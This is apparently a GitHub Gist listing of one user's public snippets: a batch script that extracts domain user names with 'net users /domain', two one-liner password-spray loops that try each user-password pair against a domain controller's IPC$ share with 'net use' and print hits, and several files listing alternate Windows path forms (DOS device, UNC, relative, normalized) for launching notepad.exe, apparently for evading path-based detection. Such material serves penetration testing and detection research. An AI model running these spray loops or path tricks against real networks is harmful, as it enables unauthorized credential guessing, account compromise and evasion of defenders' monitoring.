Skip to content

Instantly share code, notes, and snippets.

View clr2of8's full-sized avatar

Carrie Roberts clr2of8

359 followers · 0 following
View GitHub Profile
@clr2of8
clr2of8 / parse-net-users-bat.bat
Last active July 11, 2020 10:43
SETLOCAL EnableDelayedExpansion
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %%a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%%a & @call echo %%line: =,%% >> %temp%\1.txt
@FOR /F "delims=" %%a in (%temp%\1.txt) do @set line=%%a & @call echo %%line:, =,%% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %%n in (%temp%\2.txt) do @echo %%n >> %temp%\3.txt & @echo %%o >> %temp%\3.txt & @echo %%p >> %temp%\3.txt
@FOR /F "tokens=*" %%a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %%a >> %temp%\users.txt
@clr2of8
clr2of8 / pwd-spray-for-loop-enhanced.bat
Last active July 11, 2020 10:43
@FOR /F "delims=" %p in (pass.txt) DO @FOR /F "delims=" %n in (users.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "%p" 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete %logonserver%\IPC$ > NUL
@clr2of8
clr2of8 / pwd-spray-for-loop-basic.bat
Last active May 23, 2020 18:42
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DC-NAME\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DC-NAME\IPC$ > NUL
@clr2of8
clr2of8 / mt_fake_command_history.ps1
Created April 21, 2020 06:50
# & copy con nul
function write-stuff { 
 write-host "stuff"
}
 
write-stuff
#
@clr2of8
clr2of8 / mt_path-normalization.bat
Last active April 19, 2020 01:42
REM Path Normalization (spaces and single trailing periods are removed, forward slashes changed to backslashes)
c:\Windows.\System32.\notepad.exe
"c:\Windows\System32 \notepad.exe"
c:/Windows/System32\notepad.exe
//.\c:\Windows/System32/notepad.exe
"c:\Windows.\System32. . ./notepad.exe"
@clr2of8
clr2of8 / mt_relative-paths.bat
Last active July 11, 2020 10:44
REM Relative to root of the current drive (begins with a single component separator \ )
\Windows\System32\notepad.exe
REM Relative to current directory of the specified drive (begins with a drive letter, a volume separator, and no component separator)
c:Windows\System32\notepad.exe REM cwd must be c:\
c:..\..\..\..\Windows\System32\notepad.exe REM cwd must be less that 4 directories deep
REM Relative to current directory (begins with anything else)
non-existant-dir?-no-problem\..\..\..\..\Windows\System32\notepad.exe
extra-slashes-and-dots-are-fine.........\\\\\\\\.\\\\..\\\\..\\..\..\\Windows\\\System32\notepad.exe
@clr2of8
clr2of8 / mt_DOS-device-paths.bat
Last active April 19, 2020 03:49
REM DOS Device Paths (begins with \\. or \\?)
\\.\c:\Windows\System32\notepad.exe
\\.\BootPartition\Windows\System32\notepad.exe
\\.\HarddiskVolume4\Windows\System32\notepad.exe
\\.\Volume{b289d78f-d491-4f6b-a437-5c51a88fa48f}\Windows\System32\notepad.exe
\\.\Global\BootPartition\Windows\System32\notepad.exe
start \\.\GLOBALROOT\Device\HarddiskVolume4\Windows\System32\notepad.exe
\\.\UNC\LOCALHOST\c$\Windows\System32\notepad.exe
start \\?\c:\Windows\System32\notepad.exe
@clr2of8
clr2of8 / mt_UNC-Paths.bat
Last active July 11, 2020 10:46
REM UNC Paths (begins with two separators w/o a question mark or period following)
\\127.0.0.1\c$\Windows\System32\notepad.exe
\\LOCALHOST\c$\Windows\System32\notepad.exe
\\::1\c$\Windows\System32\notepad.exe
\\0:0:0::1\c$\Windows\System32\notepad.exe
\\127.0.0.1\admin$\System32\notepad.exe
\\DESKTOP-MH8DLT1\admin$\System32\notepad.exe
@clr2of8
clr2of8 / mt_fully-qualified-DOS-paths.bat
Last active April 19, 2020 01:45
REM Fully Qualified DOS Paths (begins with a drive letter, a volume separator, and a component separator)
c:\Windows\System32\notepad.exe
REM Environment Variables
%SystemRoot%\System32\notepad.exe
%HomeDrive%Windows\System32\notepad.exe
@clr2of8
clr2of8 / test.bat
Created April 18, 2020 13:55
# comment
dir